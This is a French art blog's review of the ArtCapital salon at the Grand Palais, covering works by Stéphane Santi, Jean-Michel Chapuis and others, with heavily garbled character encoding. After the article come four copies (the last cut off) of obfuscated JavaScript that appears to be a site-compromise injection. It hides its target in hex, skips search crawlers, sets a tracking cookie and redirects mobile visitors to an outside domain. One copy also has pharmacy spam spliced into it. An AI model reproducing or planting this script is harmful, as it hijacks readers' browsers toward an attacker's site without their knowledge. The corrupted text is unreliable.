ArtCapital,Ai??vitrine de la crAi??ation mais pas seulement

ArtctualitAi?? ArtCapital

CrAi??dit photoAi??MircoAi??Magliocca

Du 25 au 29 novembre sai??i??est tenu au Grand Palais le SalonAi??ArtCapitalAi??dont nous vous avions prAi??sentAi?? le dAi??roulement la semaine derniA?re.Ai??AprA?s notre visite, un petitAi??bilan sai??i??imposeai??i??Ai??Letai??i??sAi??see.

Comme nous vous lai??i??avions annoncAi??,Ai??ArtCapital est laAi??rAi??union de 4 salons dai??i??artistesAi??franAi??ais et internationaux. C’est la vitrine directe de cette crAi??ation contemporaine puisque ce sont les artistes eux-mA?mes qui prAi??sentent leurs Ai??uvres et qui se tiennent Ai?? la disposition du public.

AprA?s avoir passAi?? les trois contrA?les de sAi??curitAi??, et montrAi?? autant de foisAi??notreAi??billet (contexte dai??i??Ai??tat dai??i??urgence Ai??videmment mais qui refroidit un peu),Ai??on passeAi??les portes duAi??Grand Palais pour admirer ce qui, sur le papier,Ai??nousAi??a mis lai??i??eau Ai?? la bouche.Ai??

RentronsAi??!

PremiA?res impressions

Ai?? peine arrivAi??, le tournis nous prend.Ai??Beaucoup dai??i??Ai??uvres exposAi??es, trop peut-A?tre, on sai??i??y perd un peu. Et ce,Ai??mA?me si les artistesAi??ne peuvent prAi??senter que trois Ai??uvresai??i?? Cai??i??est un Salon me direz-vous, soit.Ai??

Il aurait Ai??tAi?? toutefois apprAi??ciable dai??i??A?tre mieux renseignAi??,Ai??car leAi??manque dai??i??informations, que ce soit sur les stands avec des cartels qui ne mentionnent que le nom de lai??i??artiste, et Ai??ventuellement le titre de lai??i??Ai??uvre, ou dans les catalogues proposAi??s par chaque Salon (30 euros piA?ce, pour nai??i??avoir presque que des reproductions dai??i??Ai??uvres sans biographie ou explication Ai?? propos des artistesai??i??) nous laisseAi??rapidement sur notre faim.

Heureusement, les artistes prAi??sents sont disponibles et plutA?t avenants, mais tous ne peuvent pas A?tre lAi?? tout le temps, on sai??i??en doute bien, ce qui rend de nombreux espaces assez vides. Les quelques cartes de visites glissAi??es rapidement au coin des cartels nous auront permis dai??i??aller visiter, nAi??anmoins etAi??aprA?s coup, quelques sites internet pour prendre connaissance du travail des artistes.Ai??

Le Salon des Artistes franAi??ais, hAi??ritier du SalonAi??de lai??i??AcadAi??mie, semble voler la vedette aux autres salons, notamment celui des Artistes IndAi??pendants, hAi??ritier quant Ai?? lui du Salon des RefusAi??s, qui faisait cette annAi??e la part belle Ai?? la crAi??ation corAi??enne. Tradition culturelle franAi??aise, ou hasard de la visite et des emplacementsai??i?? notre cAi??ur balance. Bref, aprA?s plusieurs minutes dai??i??acclimatation, on flA?neAi??dans les allAi??es ; on passe tranquillementAi??devant les Ai??uvres, un artiste nous interpelle pour nous expliquer son travail. Beaucoup dai??i??Ai??uvres donc, mais on ne va pas se plaindre de cette abondance de crAi??ationAi??!

Une ambiance gAi??nAi??raleAi??qui demeureAi??particuliA?re

Une fois rentrAi??, le visiteur est directement interpellAi??. Une premiA?re Ai??uvreAi??saute aux yeux comme un rappelAi??du contexteAi??gAi??nAi??ral,Ai??mais aussi comme un hommage Ai?? la crAi??ation. Lai??i??Ai??uvre intitulAi??e Ai??Ai??Valeurs rAi??publicainesAi??Ai?? de Pascal Niau, Meilleur Ouvrier de France, monstre sacrAi?? de la pA?tisserie etAi??aussi artisteAi??peintre donc, trA?neAi??Ai?? lai??i??entrAi??e du Salon. Sur fond de drapeau tricolore, lai??i??allAi??gorie de la Victoire, armAi??e,Ai??semble appelerAi??une foule Ai?? la suivre. En arriA?re-plan et comme un filigrane, le visage de la femmeAi??devantAi??ce dernier,Ai??des hommes tiennent des crayonsAi??gAi??ants, dai??i??autres photographientAi??quelque chose, tandis que certains soulA?vent des pancartesAi??Je suis Charlie. Le ton est donnAi??.Ai??

Quelques mA?tres plus loin,Ai??cai??i??est le travail du sculpteur StAi??phaneAi??Santi, invitAi?? dai??i??honneur du Salon des Artistes FranAi??ais, qui nous marque. TroisAi??magnifiques Mariannes,Ai??uneAi??bleue,Ai??uneAi??blanche etAi??uneAi??rouge, disposAi??esAi??chacuneAi??sur un piAi??destal,Ai??nous renvoient, une fois encore,Ai??Ai?? notre identitAi?? nationaleAi??et Ai?? notre histoire.Ai??Sur la gauche se trouve une autre Ai??uvreAi??du sculpteur,Ai??BlastAi??- Souffle brAi??lant dai??i??une explosion (attentat, bombardement ai??i??).Ai??Le titre est plutA?t explicite, mais on vous explique.Ai??Le travail de lai??i??artiste est basAi?? principalement surAi??lai??i??humain et ses souffrances, Ai?? la traduction de ces derniA?res par la gestuelle.Ai??Blast, sai??i??il est besoin de lai??i??expliquer, reprAi??sente un hommeAi??propulsAi?? en arriA?reAi??et soulevAi?? dans les airsAi??par le souffle dai??i??une explosion, dont la gestuelle, le visage et lai??i??expressivitAi?? du corps rAi??vA?lent lai??i??horreur et lai??i??effroi de ce terribleAi??instant fAi??cond.

Comme pour complAi??ter cette sAi??rie, Ai?? cA?tAi?? est prAi??sentAi??e lai??i??Ai??uvreAi??11 septembre 2001Ai??du sculpteurAi??Vitalino. Les choses sont claires au cas oA? vous en doutiez encore.

Du cA?tAi?? de la production picturale, les Ai??uvres sontAi??moins violentes directement,Ai??mA?me si lai??i??on sent un rAi??el questionnement des artistes contemporains sur leur propre place, la beautAi?? de la Nature, les Ai??lAi??mentsai??i?? Et il est Ai??vident que les Ai??vA?nements de janvier nai??i??ont pas laissAi?? nos crAi??ateurs sans rAi??action, commeAi??MartyneAi??Maillard avec sa toileAi??Charlie/Marianne.Ai??

Nous nai??i??allons pas faire un inventaire dAi??taillAi?? de chaque salon et artiste, cela serait un peu long, plutA?t citer quelques-uns dai??i??entre eux qui nous ont marquAi??s, comme parAi??exemple le magnifique travail desAi??graveursAi??Manuel Jumeau, MAi??daille dai??i??or 2014 du Salon des Artistes FranAi??aisAi??avec lai??i??Ai??uvre Ai??Ai??AnticycloneAi??Ai??,Ai??ouAi??encore MichA?leAi??JoffrionAi??qui traduit ses Ai??motionsAi??les plusAi??profondes Ai?? traversAi??le travail deAi??la matiA?re noire, etAi??deAi??la lumiA?re.Ai??

En photographie, le travail du couple Jacqueline et Jean-Louis GiudicelliAi??nous a plu. VAi??ritables passionnAi??s des techniques photographiques anciennes dans lai??i??esprit duAi??Pictorialisme, ils racontentAi??des scA?nesAi??de vieAi??citadinesAi??Ai?? travers des atmosphA?res particuliA?res. GAi??rardAi??Staron, mAi??daille de bronze du Salon et prix SPEOS, nous a sAi??duit par ses vues qui invitent, avec une pointe de nostalgie, Ai?? la contemplation de la mer.

Du cA?tAi?? du Salon du dessin et de la peinture Ai?? lai??i??eau, cai??i??est la dAi??lAi??gation suAi??doise qui a retenu notre attention avec des artistes comme ChristinaAi??MA?neskiAi??ld,Ai??qui tire son inspiration de la mer et de la nature au grAi?? de ses voyages, et qui prAi??sentait un paysage intitulAi?? tout simplement Ai??Ai??LandscapeAi??Ai??, ou encoreAi??LenaAi??SundbomAi??qui prAi??sentait une Ai??uvre au doux nom dai??i??Ai??Ai??IAi??skogenAi??Ai??Ai??(pour ceux qui ne parlent pas suAi??dois cela veut dire Ai??Ai??Dans les boisAi??Ai??).

Au sein du Salon Comparaisons, nous avons retenu principalement le collectif Libellule Art (qui cAi??lA?bre ses 10 ans cette annAi??e),Ai??avec comme chef de fileAi??LukA?A?Ai??KA?ndlqui,Ai?? et une trentaine dai??i??artistes choisis au sein du mouvement artistiqueAi??du RAi??alisme Magique,Ai??sai??i??est interrogAi?? sur lai??i??autoportrait. Avec un format dai??i??Ai??uvres imposAi??, chaque artiste propose une Ai??uvre sans visage qui permet aux visiteurs de sai??i??installer derriA?re, etAi??de se faireAi??ainsi prendre en photo par quelquai??i??un qui fera alors son portrait.Ai??

Kandl, Autoportrait, 2015Ai??ai??i??ai??i??Zademack, Autoportrait, 2015Ai?? CrAi??dit photo Libellule LTD

Kandl, Autoportrait, 2015Ai??ai??i??ai??i??Zademack, Autoportrait, 2015Ai??
CrAi??dit photo Libellule LT

Artctualite ZademackAi??

Enfin, chez les IndAi??pendants,Ai??lai??i??artiste LuAi??Mei, passionnAi??e de voyages, de calligraphie mais aussi de peinture occidentale, prAi??sentait une imposante Tour de Babel en encre, inspirAi??e des formes Ai??des pagodes chinoises.

UneAi??belle rencontre

ParmiAi??tous ces artistes, une belle rencontre. Celle de Jean-Michel Chapuis, sculpteur (etAi??oui encore un) autodidacte, qui crAi??e des Ai??uvres depuis sept ans.Ai??TouchAi?? lors de sa lecture de lai??i??ouvrageAi??dai??i??HenriAi??Vincenot,Ai??Le Pape des escargots, dans lequel un jeune homme mAi??tamorphose des troncs de noyer en statues religieuses, Jean-Michel Chapuis a voulu lui aussi sai??i??essayer Ai?? cet art. Souhaitant avant tout raconter une histoire, dans la tradition de la sculpture ancienne, ses Ai??uvres sai??i??inspirent des mythologies et de la nature. Du monde finalement.

Dans une de ses deuxAi??crAi??ations prAi??sentAi??es au Salon,Ai??intitulAi??e Ai??Ai??Pour la jeune femme dai??i??Oseberg Ai??, lai??i??artiste, aprA?s avoir dAi??couvert, via internet, le magnifique bateau vikingAi??exhumAi??Ai??dans la rAi??gion de TA?nsberg en NorvA?ge, et dans lequel ont Ai??tAi?? trouvAi??s deux squelettes de femmes (probablement une reine et sa servante),Ai??a voulu raconter leur histoire.Ai??Ainsi, autour de la magnifique proueAi??sculptAi??eAi??du navire, prennent place la servante qui se suicide en buvant du poison, mais aussiAi??Yggdrasil, Odin et unAi??de ses deux aigles.

Ai?? cA?tAi?? trouve place une autre Ai??uvreAi??tout aussi intAi??ressante, Ai??Ai??Coupable Ai??, elle aussi sculptAi??e Ai?? partir dai??i??un tronc de noyer. Lai??i??artiste nous exposeAi??la culpabilitAi?? de lai??i??homme. Coupable il lai??i??est, en dAi??truisant les forA?ts et en polluant les sols. Coupable il lai??i??est, en tuant les grands mammifA?res suggAi??rAi??s sur lai??i??oeuvre par la reproduction dai??i??une dAi??fense dai??i??Ai??lAi??phant. Coupable il lai??i??est, en sacrifiant des civilisations notamment en Afrique. Alors, par cynisme, lai??i??artiste reprAi??sente le monde sous la forme du logo de la marque Ai?? la pommeAi??(mais qui rappelle aussi laAi??GAi??nA?se), croquAi?? au niveau du continent africain.Ai??

Comme unAi??mementoAi??mori,Ai??trA?ne au sommet de lai??i??Ai??uvre un koala qui se protA?ge des hommesAi??tout en leur tendant une cordeAi??de penduAi??; Ai?? cA?tAi?? de lui, une Tour de Babel, dont les racines dai??i??un arbre sont en train de prendre possession.Ai??

Ai??Ai??Ce nai??i??est pas une vision pessimisteAi??du mondeAi??!Ai??Ai?? nous dira lai??i??artiste, ni plus ni moins quai??i??un Ai??tat des lieux. Peu importe ce quai??i??il se passe, Ai??Ai??la nature reprendra ses droitsAi??Ai??.Ai??

Lai??i??impressionnante dextAi??ritAi?? de lai??i??artiste, ainsi que sa vision des choses, nous ont laissAi?? totalement charmAi??s.

Mais alors, quel bilanAi???

ArtCapitalAi??vous lai??i??aurez compris, avait un goAi??t particulier cette annAi??e en raison de lai??i??actualitAi??. Les Ai??uvres prAi??sentAi??es semblent, pour la plupart,Ai?? exprimer les questionnements et lesAi??Ai??motions des artistes contemporains, leur dAi??senchantementAi??face au contexte international, aux violences quotidiennes de plus en plus frAi??quentes, mais surtout, de plus en plus proches.Ai??

Outre cette expression de la violence, on devine une volontAi?? de retour vers la nature, vers les diffAi??rentes mythologies qui ont fondAi?? nos sociAi??tAi??s, vers les animauxAi??aussiAi??(beaucoup de reprAi??sentations dai??i??animaux Ai?? travers les sculpteurs animaliers comme IsabelleAi??SamanonAi??ou les peintres). On ose le dire, un retour Ai?? lai??i??essentiel, de reprendreAi??possession par la connaissance deAi??ce qui fait que nous existons.Ai??

Ainsi, le mythe de lai??i??artiste visionnaire semble avoir trouvAi?? un Ai??cho cetteAi??annAi??e au sein de la crAi??ation contemporaine. Les artistes nous font voir, plus que jamais, ce quai??i??il se passe autour de nous. Comme un rAi??veilAi??brutal mais nAi??cessaire.Ai??

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| buy nolvadex, Zoloft withoutprescription. |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 